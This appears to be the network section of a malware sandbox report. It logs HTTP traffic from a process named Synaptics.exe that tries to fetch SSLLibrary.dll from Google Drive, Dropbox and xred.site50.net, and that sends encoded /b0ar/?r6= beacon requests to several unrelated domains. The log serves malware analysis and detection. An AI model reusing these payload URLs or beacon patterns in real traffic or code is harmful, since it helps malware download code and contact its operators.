Network Analysis

GET /uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache

HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 x-chromium-appcache-fallback-override: disallow-fallback P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-SrkI3al6274QNK0E4lalFA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Date: Thu, 02 Sep 2021 00:16:24 GMT Expires: Thu, 02 Sep 2021 00:16:24 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=222=vjQSRo1aEc3IkM3otg0b0XP0SoJ3vdx8rD-NQUy9VZx_nH_-XS4hJhsiPmOgyWnH3dnlzw00NDzEP_GhFCCZXUsLi4ixHfgqIHbaICAjWakxLMFBGZSzU7Lj-0F-vvl-k5JVVYCflWZygtTNATJycrQZMR4r2pYnGGf3HniDSho; expires=Fri, 04-Mar-2022 00:16:24 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /s/fzj752whr3ontsm/SSLLibrary.dll?dl=1 HTTP/1.1 User-Agent: Synaptics.exe Host: www.dropbox.com Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently Cache-Control: no-cache,no-cache, no-store Content-Security-Policy: sandbox Location: /s/dl/fzj752whr3ontsm/SSLLibrary.dll Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MTIxMzE4MDQyMzg4NzEzMDMzNjk2NjMxODUwMzc4OTcxMDg2Nzky; expires=Tue, 01 Sep 2026 00:16:25 GMT; HttpOnly; Path=/; Secure Set-Cookie: t=om_PBxMIuGBGyA2-h2zjFyDA; Domain=dropbox.com; expires=Sun, 01 Sep 2024 00:16:25 GMT; HttpOnly; Path=/; Secure Set-Cookie: __Host-js_csrf=om_PBxMIuGBGyA2-h2zjFyDA; expires=Sun, 01 Sep 2024 00:16:25 GMT; Path=/; Secure Set-Cookie: locale=en; Domain=dropbox.com; expires=Tue, 01 Sep 2026 00:16:25 GMT; Path=/; Secure X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Type: text/html; charset=utf-8 Accept-Encoding: identity,gzip Date: Thu, 02 Sep 2021 00:16:25 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains Strict-Transport-Security: max-age=31536000; includeSubDomains Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 3edb699334d545a58f635bf793b00422 Transfer-Encoding: chunked

GET /s/dl/fzj752whr3ontsm/SSLLibrary.dll HTTP/1.1 User-Agent: Synaptics.exe Host: www.dropbox.com Cache-Control: no-cache Connection: Keep-Alive Cookie: gvc=MTIxMzE4MDQyMzg4NzEzMDMzNjk2NjMxODUwMzc4OTcxMDg2Nzky; __Host-js_csrf=om_PBxMIuGBGyA2-h2zjFyDA; t=om_PBxMIuGBGyA2-h2zjFyDA; locale=en

HTTP/1.1 404 Not Found Content-Security-Policy: sandbox allow-forms allow-scripts Content-Type: text/html Accept-Encoding: identity,gzip Date: Thu, 02 Sep 2021 00:16:25 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 1144 Strict-Transport-Security: max-age=31536000; includeSubDomains Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Cache-Control: no-cache, no-store Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: cb3b869b748f41bcbc96a41e622d631e

GET /migrate?static=true HTTP/1.1 User-Agent: Synaptics.exe Connection: Keep-Alive Cache-Control: no-cache Host: www.000webhost.com

HTTP/1.1 403 Forbidden Date: Thu, 02 Sep 2021 00:16:26 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare CF-RAY: 68828cb48da012de-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET /b0ar/?r6=32cJvtm6v5CrHkGtRaCKvnIzMPMaS8klC7QMWGugGRjVzPiNEaTJc2oUIDqYaKdywZUrkA7f&sBZxr2=FxopsJeXPvOX3 HTTP/1.1 Host: www.livingalcohol.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 02 Sep 2021 00:15:43 GMT Content-Type: text/html Content-Length: 275 ETag: "612d4fd4-113" Via: 1.1 google Connection: close

GET /b0ar/?r6=FI6V3ciXB53f+evAnSijLVseR7Fj9SHqs11tijwh7SEaqCYqOPT9yA6Mp0JLeXWl2GeMTJcV&sBZxr2=FxopsJeXPvOX3 HTTP/1.1 Host: www.artjohntravis.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 02 Sep 2021 00:15:48 GMT Content-Type: text/html Content-Length: 275 ETag: "612d4fd4-113" Via: 1.1 google Connection: close

GET /b0ar/?r6=35zmK/1nOG3ZiclOaRDNqBcycOB07sOwoO1SOSl9YfrEiskurZgjdyrE07vb97UKsZwkKKa4&sBZxr2=FxopsJeXPvOX3 HTTP/1.1 Host: www.thepink.club Connection: close

HTTP/1.1 403 Forbidden Date: Thu, 02 Sep 2021 00:15:59 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: nginx Vary: Accept-Encoding

GET /b0ar/?r6=oBVrEuqKUfopUpAnqJfem3AP4MxLKUs3kUwU0NiQ7+oE8UvVtrvEXTcSUGgYTlPvZxyytEEp&sBZxr2=FxopsJeXPvOX3 HTTP/1.1 Host: www.mcinerneychrysler.com Connection: close

HTTP/1.1 301 Moved Permanently Server: nginx Cache-Control: no-store Location: https://www.mcinerneychrysler.com/b0ar/?r6=oBVrEuqKUfopUpAnqJfem3AP4MxLKUs3kUwU0NiQ7+oE8UvVtrvEXTcSUGgYTlPvZxyytEEp&sBZxr2=FxopsJeXPvOX3 Content-Length: 0 Date: Thu, 02 Sep 2021 00:16:14 GMT Connection: close Set-Cookie: JSESSIONID=58A540248AF0A901E7A137ABAED4ACC7; Path=/; HttpOnly Set-Cookie: locale=en_US; Max-Age=2592000; Expires=Sat, 02-Oct-2021 00:16:13 GMT; Path=/ Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=8582 Server-Timing: origin; dur=171

GET /b0ar/?r6=7CUt39hPMjg/s6qQ0+QbWtikgyOufco6CG9l+t5DjC9/JIPCU/WxQ6IAIg/iVENqz91MlH14&sBZxr2=FxopsJeXPvOX3 HTTP/1.1 Host: www.vnielvmdqxk538.xyz Connection: close

GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Sep 2021 00:16:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Cache: MISS

GET /b0ar/?r6=GBw5w5TP0zGw7Ui1KyuWLvjFNgn/VJyG24akOFBAUZbsXTnWiW1DuuZdfbFm7e75UOMWX9j4&sBZxr2=FxopsJeXPvOX3 HTTP/1.1 Host: www.algarmotorcars.com Connection: close

HTTP/1.1 301 Moved Permanently Date: Thu, 02 Sep 2021 00:16:17 GMT Content-Length: 0 Connection: close location: https://www.algarmotorcars.com/b0ar?r6=GBw5w5TP0zGw7Ui1KyuWLvjFNgn%2FVJyG24akOFBAUZbsXTnWiW1DuuZdfbFm7e75UOMWX9j4&sBZxr2=FxopsJeXPvOX3 strict-transport-security: max-age=120 x-wix-request-id: 1630541777.4995879943432555 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=ae1 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVhUpRT7gI5lpwC6VO/sUbfq,m0j2EEknGIVUW/liY8BLLvkiKiU38sRrmK2XwMFvFO0sxHMvs66Scc9GzPdq8oXa,2d58ifebGbosy5xc+FRalv/NbHAaASdVtck3qNT35XeYaj3xMADOV7bV+RwYs6XCt9ixLqdDyDHNl7JhEyPjXCowlimqXXRZThBA8XBqMGs=,2UNV7KOq4oGjA5+PKsX47Mci82Q35Aqg07TRfNbLwJRYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,xXLsLbWEHLk6hl9EcGlmxi99IURIKYYksPnccM1rNOA=,yQPRWbhuDep69mmCOG99v0nNHKvBrVwxEcBNhuP7NEs0xla9SbmtsDu065Hzj+uVd3MtMILCY4OR2GCMuJS3fA== Cache-Control: no-cache X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10

GET /syn/SSLLibrary.dll HTTP/1.1 User-Agent: Synaptics.exe Host: xred.site50.net Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 02 Sep 2021 00:16:26 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://www.000webhost.com/migrate?static=true X-Frame-Options: sameorigin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block